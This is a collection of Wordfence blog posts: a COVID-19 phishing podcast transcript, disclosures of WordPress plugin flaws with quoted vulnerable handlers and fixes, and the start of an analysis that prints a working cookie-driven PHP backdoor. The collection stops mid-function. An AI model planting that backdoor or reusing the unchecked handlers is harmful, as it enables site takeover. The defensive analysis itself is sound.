Episode 71: Hackers Targeting COVID-19 Fears

With many of us under either lockdown or shelter-in-place orders due to the COVID-19/coronavirus pandemic, fear and stress are rampant. This additional stress lowers our critical thinking capabilities and increases our vulnerability. Hackers targeting these human vulnerabilities are using the global pandemic to attempt exploitation through numerous scams and phishing campaigns. We also cover plugin vulnerabilities affecting tens of thousands of sites as well as a new product from Wordfence, Fast or Slow, a global website speed profiler.

Here are timestamps and links in case you’d like to jump around, and a transcript is below.
2:05 Coronavirus scams found and explained
4:48 HHS.gov open redirect used by coronavirus phishing to spread malware
8:00 Vulnerabilities patched in the Data Tables Generator by Supsystic Plugin
9:52 Vulnerability in WPvivid Backup Plugin can lead To database leak
10:29 Wordfence launches Fast or Slow, a website profiling tool measuring site performance from major global locations

Find us on your favorite app or platform including iTunes, Google Podcasts, Spotify, YouTube, SoundCloud and Overcast.


Have a story you’d like us to cover or someone you’d like to interview? Let us know! Contact us at press AT wordfence.com!

Episode 71 Transcript

Hi, and welcome to episode 71 of Think Like a Hacker. This is the podcast about WordPress, security, and innovation.

It is the end of March 2020, and we’re going through a lot worldwide. We’re not going to have an interview this week with so much going on. We are under shelter-in-place or lockdowns around the world as public health officials strive to keep as many people safe from coronavirus infection as possible. With death tolls rising around the world, it feels like we’re in a new era of humanity.

Obviously, we’re all under some elevated stress, and that elevated stress and the requisite fear is making us susceptible to making poor decisions. As I talked about last week, scientists say that when we are under no stress whatsoever, we can handle about seven, plus or minus two, bits of information at any given time, that means what we can perceive, and when we’re under stress or when we’re in a fear state, which is basically a stress state, that makes us even more susceptible to perceiving less. It makes us vulnerable.

I woke up this morning to a news story that a man here in the Phoenix area had died from taking an aquarium cleaning substance that he thought would protect him from coronavirus. When we’re in fear, we’re not thinking our best. It’s really time for us now to slow down, to put a buffer zone between the stimulus of this stressful environment that we are all now in, and our response to that environment. It’s important now for us to really get good data and make good decisions.

With that, our first story today is from MalwareBytes, and they went through some of the coronavirus scams that have been coming online. In their blog post, they noted that a Twitter user had published a web tracker finding that 3,600 host names came online in just 24 hours that were related to coronavirus or COVID-19, and Risk IQ reported that they had tracked more than 13,000 suspicious coronavirus related domains over the course of a weekend, and on the very next day, more than 35,000 domains. All of these links are going to be in the show notes.

What does this tell us? It tells us that hackers are detecting vulnerability. They’re not detecting necessarily vulnerability in our systems, but they know that there’s vulnerability where there is fear, and they are targeting the weakest link. Most of these are phishing campaigns. They also detail a story that we’ve covered in the podcast a couple of episodes ago about an email phishing campaign sent by threat actors that were impersonating the World Health Organization with the intent of stealing credentials, usernames and passwords. They detail some incidents where threat actors are attempting to install malicious payloads on systems.

Now obviously, this shows that there’s going to be a growing threat, and this threat is not targeting our computers, it’s targeting us, and it’s targeting us because we are in vulnerable states, and what do we do when we’re in vulnerable states? The best thing you can do is to take care of yourself, not only your physical health and obviously boosting your immune system, getting decent sleep, getting decent exercise, but taking care of your mental health. Your mental health ends up being that which alleviates the vulnerability of fear and stress. It alleviates the vulnerability that hackers are attempting to target right now. Whether it is meditation, deep breathing, yoga, whatever you need to do in order to take care of yourself and your mental health is going to sort of be that firewall for your life, not just your mind, not just your email, but it’s going to help you make better decisions for you, for your family, everyone around you.

Our second article is an open redirect that’s being used. It is on the Health and Human Services (HHS.gov) domain, and this is being used by malicious attackers to spread coronavirus phishing malware. So basically, emails are being sent out through this open redirect on one of their web addresses, and an open redirect basically automatically redirects users between a source website and a target site, and malicious actors use these to target phishing landing pages or deliver malware payloads, because they can do so under the guise of a legitimate service, and with everybody attuned to wanting to get the latest information about coronavirus, having an open redirect on the hhs.gov Health and Human Services website, that is definitely something dangerous. So the open redirect is in the article on BleepingComputer using it to send out a malicious attachment containing a coronavirus.doc.lnk file that unpacks obfuscated VBScript that executes a Raccoon information stealer malware payload that’s coming from an IP address also detailed in that blog post.

Now, one of the things that coronavirus is really exposing, to me, is how as a society, we are not equipped well, in many ways, to care for our elders. Obviously, this virus is targeting the most vulnerable, those of our parents and grandparents, and it’s much like what’s happening with phishing and other scams like this. Obviously, we all get phishing emails, but those who are most vulnerable to these are the most trusting, and those of our parents and our grandparents, who often find themselves victims of these types of scams, whether it’s coming through an email or it’s on a phone call or an SMS message.

I would like to posit that it is our responsibility as security professionals, and even if you don’t think of yourself as a security professional, the fact that you’re listening to this podcast means that you are aware of security, and we have a responsibility to take care of the most vulnerable in our communities, whether that be the WordPress community or our communities at home. So talk to your parents, obviously, with social distancing at this time, but talk to them about these types of threats. Make sure that they are aware. Use antivirus on their computers if you can, and support them and educate them. Obviously, our first line of defense is going to be educating anyone who’s using the internet to realize that these types of threats exist.

On to some stories in the WordPress world, we have a couple of plugin vulnerabilities to cover. First of all, Chloe Chamberland, one of our Threat Analysts here at Wordfence, found vulnerabilities in the Data Tables Generator by Supsystic [plugin]. She did find some vulnerabilities in the Pricing Table by Supsystic plugin and worked with them and both of these plugins. Now, the Data Tables Generator plugin is a WordPress plugin installed on over 30,000 sites. These flaws were quite similar and allowed attackers to execute AJAX actions that could inject malicious JavaScript and forge requests on behalf of authenticated site users.

Wordfence premium users received firewall rules against this vulnerability’s exploit on January 21, 2020, and free users received that rule on February 20th, so even though we hadn’t disclosed this because it was still being patched, you’ve been protected, if you’re using Wordfence, for quite some time. With all of the crazy stuff that’s happening in the world right now, the last thing you want to think about is updating plugins immediately, or even writing blog posts. There’s a lot of other things that are demanding our attention. So these are the times when it’s really good to have a firewall, because firewalls buy you time. Even though a vulnerability might exist in the world, you don’t even have to be aware of it. Your firewall is blocking malicious attacks, and as we’re seeing, hackers and malicious actors are much more active in times of great fear and vulnerability. So now’s the best time to make sure that everything is protected, including your WordPress site.

Our next story is a vulnerability that was patched in the WPvivid Backup plugin. This could lead to a database leak. This plugin was installed on over 30,000 sites as of a few weeks ago, and the issue has been fixed in version 0.9.36. It was another AJAX action that didn’t have an authorization check, so make sure that if you’re using that plugin that you have that patched.

Our final story. I saved the best for last, because there’s no fear associated with this. It’s not even a vulnerability. Wordfence is really happy to announce that we have a new product. This product, all free. It’s called Fast or Slow. You can find it at fastorslow.com. This tool helps you measure your WordPress — or other — site’s performance from various locations around the world. Now, if you’re interested in site performance, you’ve probably used various tools in order to measure whether your site was performing well for your users.

This tool is unique in that it looks at performance globally. So if you have a product or a service that is relevant to anyone in the world, say for example, software that you are selling online, and you would like to ensure that users in Australia, even though you’re based in, let’s say Kansas, that your users in Australia are having a good experience with your website. You can use Fast or Slow to see how Australians are experiencing your site, to see how South Americans are experiencing your site, how Europeans are. It’s a really neat tool. It’s free. You can put in your website, see how it’s performing, and we really recommend signing up for monitoring.

What this will do is run reports over time. So if your hosting provider, for example, is having an issue or you’re seeing degraded performance over time, Fast or Slow will let you know when a problem like that exists. It’s horrible to have those types of experiences sneak up on you, and you realize that your server is overloaded and not performing well, especially for a location where you have no visual experience. Fast or Slow will monitor this for you, let you know when your site might be having a problem, give you some relevant data that you can take to your developers, that you can take to your hosting provider, that you can take to heart and make better decisions in order to make sure that your site is serving your users.

With that, that is podcast episode 71 of Think Like a Hacker. Thanks for listening. If there is anything that Wordfence can do in order to support you during these very strange and different times, please, please reach out and let us know what we can do in order to be of service. We have been a remote team since our inception. All of us have our methodologies and procedures in place in order to be of service from where we’re at, and if things are shifting for you, please let us know how we can be of service, we’re here for you, and I just want to underscore again how important it is to take time during this experience to take care of your mental health. Your mental health is your firewall for your life. It’s going to allow you to really ascertain what you need to do for yourself, what you need to do for your family, what you need to do for your business in order to not only survive these troubled times, but to succeed within them.

If there’s anything I personally can do, reach out to me, Kathy [AT] wordfence.com. If there is someone that you would like me to bring on the podcast, let me know. And with that, we will wrap it up. Next week, we will have another episode, and hopefully even more good news to report.

Thanks for listening!

The post Episode 71: Hackers Targeting COVID-19 Fears appeared first on Wordfence.

Vulnerabilities Patched in IMPress for IDX Broker

On February 28, 2020, the Wordfence Threat Intelligence team became aware of a newly patched stored Cross-Site Scripting (XSS) vulnerability in IMPress for IDX Broker, a WordPress plugin with over 10,000 installations. Although all Wordfence users, including those still using the free version of Wordfence, were already protected from this vulnerability by the Web Application Firewall’s built-in XSS protection, we investigated the plugin further and discovered an additional stored XSS vulnerability. We also found a flaw that would allow an authenticated attacker with minimal, subscriber-level permissions to permanently delete any page or post on the site, in addition to creating pages with arbitrary titles.

We initially reached out to the plugin’s vendor the same day, on February 28, 2020, but received no response over an extended period of time. On March 19, 2020, after notifying the WordPress plugin team, we received a response from the plugin’s developer, at which time we sent the full disclosure details. A fully patched version was released on March 23, 2020, and we recommend updating to the latest version, 2.6.2, immediately.

Wordfence Premium users received a new firewall rule on March 2nd to protect against exploits targeting these vulnerabilities. Free Wordfence users will receive this rule on April 1, 2020.


Description: Authenticated Stored Cross-Site Scripting (XSS)
Affected Plugin: IMPress for IDX Broker
Plugin Slug: idx-broker-platinum
Affected Versions: <= 2.6.1
CVE ID: Pending
CVSS Score: 7.4 (High)
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:L
Fully Patched Version: 2.6.2

The IMPress for IDX Broker plugin contains a captcha feature to prevent spam submissions. Since it uses Google’s ReCAPTCHA service, it requires an API key. Unfortunately, the AJAX action the plugin registered to update this API key did not use capability checks or nonce checks.

This made it  possible for a logged-in attacker with minimal permissions, such as a subscriber, to send a request to wp-admin/admin-ajax.php with the action parameter set to idx_update_recaptcha_key and the idx_recaptcha_site_key parameter set to a malicious JavaScript, which could then be executed in an administrator’s browser the next time they visited the plugin’s settings panel.

As with most attacks taking advantage of stored XSS in admin areas, this could be used to make use of the administrator’s session in order to create a new, malicious administrative user.

The AJAX action:

add_action( 'wp_ajax_idx_update_recaptcha_key', array( $this, 'idx_update_recaptcha_key' ) );

The vulnerable function:

	// No capability check and no nonce check: any logged-in user who can reach
	// admin-ajax.php can overwrite this option, and the value is stored unsanitized.
	public function idx_update_recaptcha_key() {
		if ( $_POST['idx_recaptcha_site_key'] ) {
			update_option( 'idx_recaptcha_site_key', $_POST['idx_recaptcha_site_key'], false );
			echo 1;
		} else {
			delete_option( 'idx_recaptcha_site_key' );
			echo 'error';
		}
		die();
	}

Description: Authenticated Post Creation, Modification, and Deletion
Affected Plugin: IMPress for IDX Broker
Plugin Slug: idx-broker-platinum
Affected Versions: <= 2.6.1
CVE ID: CVE-2020-9514
CVSS Score: 8.1 (High)
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
Fully Patched Version: 2.6.2

One of the features included with the IDX Broker plugin is the ability to create and delete “dynamic pages,” intended to ensure that any IDX pages match the site’s style and branding.

The plugin registers two AJAX actions that are used to do this:

add_action( 'wp_ajax_create_dynamic_page', array( $this, 'idx_ajax_create_dynamic_page' ) );
add_action( 'wp_ajax_delete_dynamic_page', array( $this, 'idx_ajax_delete_dynamic_page' ) );

Once again, neither of the functions called by these AJAX actions used capability checks or nonce checks. As such it was possible for an authenticated attacker with minimal, subscriber-level, permissions to send a request to wp-admin/admin-ajax.php with the action parameter set to create_dynamic_page and the post_title parameter set to any arbitrary value. In return, a new dynamic page with that title would be created.

If a wrapper_page_id parameter was included and set to the ID of an existing post or page, that post or page would be replaced with a blank wrapper page:

	public function idx_ajax_create_dynamic_page() {

		// default page content
		$post_content = $this->does_theme_include_idx_tag();

		$post_title = $_POST['post_title'] ? $_POST['post_title'] : 'Properties';
		$new_post   = array(
			'post_title'   => $post_title,
			'post_name'    => $post_title,
			'post_content' => $post_content,
			'post_type'    => 'idx-wrapper',
			'post_status'  => 'publish',
		);
		if ( $_POST['wrapper_page_id'] ) {
			$new_post['ID'] = $_POST['wrapper_page_id'];
		}
		$wrapper_page_id = wp_insert_post( $new_post );
		update_option( 'idx_broker_dynamic_wrapper_page_name', $post_title, false );
		update_option( 'idx_broker_dynamic_wrapper_page_id', $wrapper_page_id, false );
		$wrapper_page_url = get_permalink( $wrapper_page_id );
		$this->idx_api->set_wrapper( 'global', $wrapper_page_url );
		update_post_meta( $wrapper_page_id, 'idx-wrapper-page', 'global' );

		die(
			json_encode(
				array(
					'wrapper_page_id'   => $wrapper_page_id,
					'wrapper_page_name' => $post_title,
				)
			)
		);
	}

Alternatively, if the attacker set the action parameter to delete_dynamic_page and sent a wrapper_page_id parameter with the ID of an existing post or page, then that post or page would be permanently deleted:

	// No capability check, no nonce check, and no check that the ID belongs to an
	// 'idx-wrapper' post: wp_delete_post() with $force_delete = true bypasses the trash,
	// so any post or page ID supplied by the caller is removed for good.
	public function idx_ajax_delete_dynamic_page() {
		if ( $_POST['wrapper_page_id'] ) {
			wp_delete_post( $_POST['wrapper_page_id'], true );
			wp_trash_post( $_POST['wrapper_page_id'] );
		}
		die();
	}
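For contrast, here is an added example (our own illustration, not the plugin’s patched 2.6.2 code) of the two handlers above rewritten with the standard WordPress protections: a nonce check against CSRF, a capability check, input sanitization, and, for the delete action, a check that the target really is one of the plugin’s own wrapper pages rather than an arbitrary post. The nonce action name idx_admin_nonce, the manage_options capability, and the site-key format check are assumptions made for this example.

```php
<?php
// Added example (not the plugin's own code): hardened versions of the two
// IMPress for IDX Broker AJAX handlers. The nonce action name 'idx_admin_nonce'
// is an assumption; the admin page's JavaScript would have to send a nonce
// created with wp_create_nonce( 'idx_admin_nonce' ) as the _ajax_nonce field.

class IDX_Hardened_Ajax_Handlers {

	public function __construct() {
		add_action( 'wp_ajax_idx_update_recaptcha_key', array( $this, 'idx_update_recaptcha_key' ) );
		add_action( 'wp_ajax_delete_dynamic_page', array( $this, 'idx_ajax_delete_dynamic_page' ) );
	}

	/**
	 * Shared guard for admin-only AJAX actions: the nonce proves the request came
	 * from the plugin's own admin page (CSRF protection), and the capability check
	 * limits the action to administrators instead of any logged-in user.
	 */
	private function require_admin_request() {
		// check_ajax_referer() dies with -1 when the nonce is missing or invalid.
		check_ajax_referer( 'idx_admin_nonce' );

		if ( ! current_user_can( 'manage_options' ) ) {
			wp_send_json_error( 'Insufficient permissions.', 403 );
		}
	}

	public function idx_update_recaptcha_key() {
		$this->require_admin_request();

		$site_key = isset( $_POST['idx_recaptcha_site_key'] )
			? sanitize_text_field( wp_unslash( $_POST['idx_recaptcha_site_key'] ) )
			: '';

		// Assumption for this example: a reCAPTCHA site key is a short token of
		// letters, digits, '_' and '-'. Rejecting anything else keeps markup out of
		// the option table entirely, independent of output escaping on the settings page.
		if ( '' !== $site_key && ! preg_match( '/^[A-Za-z0-9_-]{20,100}$/', $site_key ) ) {
			wp_send_json_error( 'Invalid site key format.', 400 );
		}

		if ( '' !== $site_key ) {
			update_option( 'idx_recaptcha_site_key', $site_key, false );
			wp_send_json_success( 1 );
		}

		delete_option( 'idx_recaptcha_site_key' );
		wp_send_json_error( 'error' );
	}

	public function idx_ajax_delete_dynamic_page() {
		$this->require_admin_request();

		$wrapper_page_id = isset( $_POST['wrapper_page_id'] ) ? absint( $_POST['wrapper_page_id'] ) : 0;

		// Object-level check: only posts of the plugin's own 'idx-wrapper' type may be
		// deleted here, so even a valid admin request cannot remove arbitrary content.
		if ( 0 === $wrapper_page_id || 'idx-wrapper' !== get_post_type( $wrapper_page_id ) ) {
			wp_send_json_error( 'Not a dynamic wrapper page.', 400 );
		}

		wp_delete_post( $wrapper_page_id, true );
		wp_send_json_success( array( 'deleted' => $wrapper_page_id ) );
	}
}

new IDX_Hardened_Ajax_Handlers();
```

Two points worth noting. The settings panel that renders the stored key should still escape it with esc_attr() on output; input validation and output escaping are separate defenses, and the stored XSS described above only works because neither was present. And the post-type check on delete is what turns "an administrator can delete any post through this endpoint" into "an administrator can delete the plugin's wrapper pages", which is all the feature ever needed.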

Disclosure Timeline

February 28, 2020 – Our Threat Intelligence team discovers and analyzes vulnerabilities in the IMPress for IDX Broker plugin while reviewing a recently patched vulnerability. We attempt to make contact with the plugin vendor.
March 2, 2020 – Firewall rule released for Wordfence Premium users.
March 19, 2020 – After follow-up with the WordPress.org plugin team, plugin vendor confirms appropriate mailbox, and we provide them with full disclosure.
March 23, 2020 – Fully patched version becomes available.
April 1, 2020 – Firewall rule becomes available to Wordfence free users.

Conclusion

In today’s post, we detailed several vulnerabilities including stored XSS and Post creation, modification, and deletion found in the IMPress for IDX Broker plugin. These flaws have been patched in version 2.6.2, and we recommend that users update to the latest version available immediately. Sites running Wordfence Premium have been protected from attacks against this vulnerability since March 2, 2020. Sites running the free version of Wordfence received the firewall rule update on April 1, 2020.

The post Vulnerabilities Patched in IMPress for IDX Broker appeared first on Wordfence.

Severe Flaws Patched in Responsive Ready Sites Importer Plugin

On March 2nd, our Threat Intelligence team discovered several vulnerable endpoints in Responsive Ready Sites Importer, a WordPress plugin installed on over 40,000 sites. These flaws allowed any authenticated user, regardless of privilege level, the ability to execute various AJAX actions that could reset site data, inject malicious JavaScript in pages, modify theme customizer data, import .xml and .json files, and activate plugins, among many other actions.

We reached out to the plugin’s developer on March 3, 2020, and they were proactive and quick to respond. They released patches consisting of nonce and permissions checks on nearly all of the AJAX endpoints before we sent over the full vulnerability details the following morning. We still provided the full disclosure, and pointed out a few AJAX endpoints missed in their initial release. They released a final patch just a few days later.

This is considered a severe security issue that could lead to attackers completely taking over WordPress sites. We highly recommend updating to the latest version available, 2.2.7, immediately.

Wordfence Premium customers received a new firewall rule on March 2, 2020, to protect against exploits targeting this vulnerability. Free Wordfence users will receive the rule after thirty days, on April 1, 2020.

Description: Unprotected AJAX Actions
Affected Plugin: Responsive Ready Sites Importer
Plugin Slug: responsive-add-ons
Affected Versions: <= 2.2.5
CVE ID: Will be updated once identifier is supplied.
CVSS Score: 9.1 (Critical)
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:L
Fully Patched Version: 2.2.6

Gutenberg & Elementor Templates Importer For Responsive, also called Responsive Ready Sites Importer, is a plugin designed to import templates and site content to be used with the Gutenberg or Elementor page builders. The plugin is very simple to use and provides a plethora of templates for site owners to choose from.

The import functionality relies on various AJAX actions, with functionalities ranging from resetting site data prior to an import all the way to importing .xml and .json files to provide data for the import. We discovered 23 vulnerable endpoints, and the majority of these were found in the /class-responsive-ready-sites-importer.php file.

/**
 * Constructor.
 *
 * @since 1.0.0
 */
public function __construct() {

   add_action( 'init', array( $this, 'load_importer' ) );

   $responsive_ready_sites_importers_dir = plugin_dir_path( __FILE__ );
   require_once $responsive_ready_sites_importers_dir . 'class-responsive-ready-sites-importer-log.php';
   include_once $responsive_ready_sites_importers_dir . 'class-responsive-ready-sites-widgets-importer.php';
   include_once $responsive_ready_sites_importers_dir . 'class-responsive-ready-sites-options-importer.php';

   // Import AJAX.
   add_action( 'wp_ajax_responsive-ready-sites-import-set-site-data-free', array( $this, 'import_start' ) );
   add_action( 'wp_ajax_responsive-ready-sites-import-xml', array( $this, 'import_xml_data' ) );
   add_action( 'wp_ajax_responsive-ready-sites-import-wpforms', array( $this, 'import_wpforms' ) );
   add_action( 'wp_ajax_responsive-ready-sites-import-customizer-settings', array( $this, 'import_customizer_settings' ) );
   add_action( 'wp_ajax_responsive-ready-sites-import-widgets', array( $this, 'import_widgets' ) );
   add_action( 'wp_ajax_responsive-ready-sites-import-options', array( $this, 'import_options' ) );
   add_action( 'wp_ajax_responsive-ready-sites-import-end', array( $this, 'import_end' ) );

   add_action( 'responsive_ready_sites_import_complete', array( $this, 'clear_cache' ) );

   include_once $responsive_ready_sites_importers_dir . 'batch-processing/class-responsive-ready-sites-batch-processing.php';

   // Reset Customizer Data.
   add_action( 'wp_ajax_responsive-ready-sites-reset-customizer-data', array( $this, 'reset_customizer_data' ) );
   add_action( 'wp_ajax_responsive-ready-sites-reset-site-options', array( $this, 'reset_site_options' ) );
   add_action( 'wp_ajax_responsive-ready-sites-reset-widgets-data', array( $this, 'reset_widgets_data' ) );

   // Reset Post & Terms.
   add_action( 'wp_ajax_responsive-ready-sites-delete-posts', array( $this, 'delete_imported_posts' ) );
   add_action( 'wp_ajax_responsive-ready-sites-delete-wp-forms', array( $this, 'delete_imported_wp_forms' ) );
   add_action( 'wp_ajax_responsive-ready-sites-delete-terms', array( $this, 'delete_imported_terms' ) );

   if ( version_compare( get_bloginfo( 'version' ), '5.0.0', '>=' ) ) {
      add_filter( 'http_request_timeout', array( $this, 'set_timeout_for_images' ), 10, 2 );
   }
}

Using the import_start function tied to the wp_ajax_responsive-ready-sites-import-set-site-data-free action as an example (shown below), the lack of both capability checks and nonce checks in these functions is plain. The same was true of every function triggered by the registered AJAX actions that we found vulnerable.

/**
 * Start Site Import
 *
 * @since  1.0.0
 * @return void
 */
public function import_start() {

   $demo_api_uri = isset( $_POST['api_url'] ) ? esc_url( $_POST['api_url'] ) : ''; //phpcs:ignore

   if ( ! empty( $demo_api_uri ) ) {

      $demo_data = self::get_responsive_single_demo( $demo_api_uri );
      if ( ! $demo_data['success'] ) {
         wp_send_json( $demo_data );
      }

      update_option( 'responsive_ready_sites_import_data', $demo_data );

      if ( is_wp_error( $demo_data ) ) {
         wp_send_json_error( $demo_data->get_error_message() );
      } else {
         do_action( 'responsive_ready_sites_import_start', $demo_data, $demo_api_uri );
      }

      wp_send_json_success( $demo_data );

   } else {
      wp_send_json_error( __( 'Request site API URL is empty. Try again!', 'responsive-addons' ) );
   }

}

All of the vulnerable actions could be called with a simple request to /wp-admin/admin-ajax.php?action=[Vulnerable-Action] along with the appropriate parameters set, by any authenticated user, including users with minimal subscriber-level permissions.

Fortunately, in the latest version of this plugin, capability checks to help control access and execution, as well as CSRF protection using WordPress nonces, were implemented on all of these endpoints.

A Deeper Dive on a Few Endpoints

Although there were several unprotected endpoints, a few were a little more worrisome than others.

The AJAX action wp_ajax_responsive-ready-sites-import-xml triggers a function that imports an XML file to be used to supply data as part of the import process. Then, the AJAX action wp_ajax_responsive-wxr-import would trigger the function that imports all the data from the previously imported XML file. Using these two actions together could allow an attacker to import an XML file containing malicious payloads such as new pages on the site. The malicious payloads would then be executed anytime a user browsed to the newly imported page. This could result in malicious site redirects and rogue administrative user creation, among other consequences.

The AJAX actions wp_ajax_responsive-ready-sites-import-options, wp_ajax_responsive-ready-sites-import-widgets, and wp_ajax_responsive-ready-sites-import-customizer-settings triggered functions that would import widgets, site options, and site customizer data. These could be used by an attacker to overwrite site data with malicious data of their choice.

A Brief Note To Site Owners and WordPress Developers

Site owners. Vulnerable AJAX endpoints are, unfortunately, a very common vulnerability among WordPress plugins and themes. We highly recommend disabling user registration on your site if it is not necessary for the site’s functionality. If your site is running a plugin or theme with a vulnerable AJAX endpoint, this will prohibit any attackers from being able to register an account, login, and then execute attacks against these vulnerable endpoints that could potentially compromise your site.

It is also highly recommended to ensure your plugins and themes are up to date at all times as these vulnerabilities are often immediately discovered and patched. In the cases where a patch isn’t released quickly, it is important you have a Web Application Firewall in place, such as the one provided by Wordfence, to help provide protection during the interim period where a vulnerability might be discovered and actively attacked before it has been completely patched.

Developers. It is incredibly important to add capability checks and CSRF protection on functions controlled by AJAX actions in plugins and themes. Subscriber-level users and above have the ability to execute these actions if the proper security measures are not in place. Many WordPress sites allow open registration, creating a large attack surface for these vulnerabilities that are typically very easy to exploit.

Use functions like current_user_can() to check for user capability on actions along with wp_create_nonce() and wp_verify_nonce() to verify the legitimacy of a request’s source to protect against CSRF on all AJAX functions.
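Reviewing a plugin for this class of flaw comes down to listing its wp_ajax_ registrations and reading each handler for exactly those two calls. The following added example (our own illustration, not Wordfence’s tooling) automates that first pass: it extracts the add_action( 'wp_ajax_…', array( $this, '…' ) ) registrations from a source file, locates each handler’s body, and reports whether a nonce check and a capability check appear in it. The plugin source it runs over is constructed for the demonstration and is not any real plugin.

```php
<?php
// Added example (not Wordfence's tooling): a rough static audit that lists the
// wp_ajax_ actions a plugin file registers and flags handlers whose body contains
// neither a nonce check nor a capability check. The sample plugin source below
// is constructed for the demonstration.

$sample_plugin_source = <<<'PHP'
<?php
class Demo_Importer {
	public function __construct() {
		add_action( 'wp_ajax_demo-import-xml', array( $this, 'import_xml_data' ) );
		add_action( 'wp_ajax_demo-reset-site-options', array( $this, 'reset_site_options' ) );
		add_action( 'wp_ajax_nopriv_demo-public-ping', array( $this, 'public_ping' ) );
	}
	public function import_xml_data() {
		$file = isset( $_POST['xml_file'] ) ? $_POST['xml_file'] : '';
		wp_send_json_success( $file );
	}
	public function reset_site_options() {
		check_ajax_referer( 'demo_nonce' );
		if ( ! current_user_can( 'manage_options' ) ) {
			wp_send_json_error( 'forbidden', 403 );
		}
		wp_send_json_success();
	}
	public function public_ping() {
		wp_send_json_success( 'pong' );
	}
}
PHP;

// Find every add_action( 'wp_ajax_...', array( $this, 'method' ) ) and return action => method.
function find_ajax_registrations( $source ) {
	$registrations = array();
	$pattern = '/add_action\(\s*[\'"](wp_ajax_(?:nopriv_)?[^\'"]+)[\'"]\s*,\s*array\(\s*\$this\s*,\s*[\'"]([A-Za-z0-9_]+)[\'"]\s*\)/';
	if ( preg_match_all( $pattern, $source, $matches, PREG_SET_ORDER ) ) {
		foreach ( $matches as $m ) {
			$registrations[ $m[1] ] = $m[2];
		}
	}
	return $registrations;
}

// Extract the body of a named method by matching braces from its opening "{".
// Adequate for formatted plugin code; it does not understand braces inside strings.
function extract_function_body( $source, $name ) {
	if ( ! preg_match( '/function\s+' . preg_quote( $name, '/' ) . '\s*\([^)]*\)\s*\{/', $source, $m, PREG_OFFSET_CAPTURE ) ) {
		return null;
	}
	$start = $m[0][1] + strlen( $m[0][0] );
	$depth = 1;
	$len   = strlen( $source );
	for ( $i = $start; $i < $len; $i++ ) {
		if ( '{' === $source[ $i ] ) {
			$depth++;
		} elseif ( '}' === $source[ $i ] ) {
			$depth--;
			if ( 0 === $depth ) {
				return substr( $source, $start, $i - $start );
			}
		}
	}
	return null;
}

// One finding per registered action: which protections its handler calls directly.
function audit_ajax_handlers( $source ) {
	$findings = array();
	foreach ( find_ajax_registrations( $source ) as $action => $method ) {
		$body      = extract_function_body( $source, $method );
		$has_nonce = null !== $body && (bool) preg_match( '/\b(check_ajax_referer|wp_verify_nonce|check_admin_referer)\s*\(/', $body );
		$has_cap   = null !== $body && (bool) preg_match( '/\bcurrent_user_can\s*\(/', $body );
		$findings[] = array(
			'action'  => $action,
			'method'  => $method,
			'nonce'   => $has_nonce,
			'cap'     => $has_cap,
			'nopriv'  => 0 === strpos( $action, 'wp_ajax_nopriv_' ),
			'verdict' => ( $has_nonce && $has_cap ) ? 'protected' : 'REVIEW',
		);
	}
	return $findings;
}

foreach ( audit_ajax_handlers( $sample_plugin_source ) as $f ) {
	printf(
		"%-9s %-32s nonce=%s cap=%s%s\n",
		$f['verdict'],
		$f['action'],
		$f['nonce'] ? 'yes' : 'no',
		$f['cap'] ? 'yes' : 'no',
		$f['nopriv'] ? ' (reachable without login)' : ''
	);
}
```

Treat a REVIEW verdict as a prompt to read the handler, not as a confirmed vulnerability: a handler that delegates its checks to a shared guard method, or that only reads data, will be flagged even though it may be fine. The wp_ajax_nopriv_ registrations deserve the closest look, since those run for visitors who are not logged in at all.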

To see how common these vulnerabilities are, you can review some of our recently discovered unprotected AJAX actions vulnerabilities in Popup Builder, Import Export WordPress Users, 301 Redirects – Easy Redirect Manager, and RegistrationMagic. As a plugin developer, it is important to take preventive steps against creating these vulnerabilities, just as it is important to protect yourself against these as a site owner.

Disclosure Timeline

March 2, 2020 – Initial discovery and analysis of vulnerability. We release a firewall rule for Wordfence Premium customers.
March 3, 2020 – We make our initial contact attempt with the plugin development team. Developer responds and confirms that we have reached them through the appropriate inbox.
March 4, 2020 – We send over the full disclosure details. Developer responds and indicates all vulnerabilities have been fixed.
March 4-5, 2020 – We further analyze the fixes and discover a few AJAX actions left unprotected. We notify the developer.
March 11, 2020 – Developer releases final sufficient patch.
April 1, 2020 – Free Wordfence users receive firewall rule.

Conclusion

In today’s post, we detailed several flaws related to unprotected AJAX actions in the Responsive Ready Sites Importer plugin. These flaws have been fully patched in version 2.2.6. We recommend that users update to the latest version available immediately. Sites running Wordfence Premium have been protected from attacks against this vulnerability since March 2, 2020. Sites running the free version of Wordfence will receive the firewall rule update on April 1, 2020.

The post Severe Flaws Patched in Responsive Ready Sites Importer Plugin appeared first on Wordfence.

Assemble the Cookies

When we investigate compromised websites, it’s not unusual to find malicious files that have been obfuscated through forms of encoding or encryption — however, these are not the only methods that attackers use to obfuscate code.

Obfuscation via Predefined PHP Variables

Here’s an example of obfuscation that doesn’t use encoding or encryption in any way:

<?php
$x='_C';$v='OO';/*5h*/$o='KI';/*{*Z*/$qv='E';$j/*8i$7*/=${$x.$v.$o.$qv};if(isset($j/*f(UZ*/['Q'])){$oo=$j/*Mr*/['Q'].$j['J'];$tj=/*m5d*/$j['St'].$j['V'].$j['x'];$pd=$oo('',$tj($j['U']));$pd();}

Instead, this example splits a PHP predefined variable, $_COOKIE, into segmented strings assigned to variables before concatenating them.
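Because nothing here is encoded, the pieces can be put back together statically. The following added example (our own illustration, not code from the Sucuri post) uses PHP’s tokenizer to discard the inline comments, collect the string-literal assignments, resolve the ${ … } variable-variable to the predefined variable it names, and list which keys of that variable the code goes on to read. The sample it analyzes is constructed to mirror the pattern above and is only tokenized, never executed.

```php
<?php
// Added example, not code from the Sucuri post: a static resolver built on PHP's
// tokenizer. It reveals which predefined variable a split-and-concatenate construct
// assembles and which keys of it the code reads, without executing the sample.
// The sample below is constructed to mirror the pattern above; it is only tokenized.

$sample = <<<'PHP'
<?php
$x='_C';$v='OO';/*5h*/$o='KI';/*{*Z*/$qv='E';$j/*8i$7*/=${$x.$v.$o.$qv};
if(isset($j/*f(UZ*/['Q'])){$oo=$j/*Mr*/['Q'].$j['J'];$tj=/*m5d*/$j['St'].$j['V'].$j['x'];}
PHP;

// Tokenize and drop comments and whitespace, which the obfuscator sprinkles in to defeat naive greps.
function significant_tokens( $code ) {
	$out = array();
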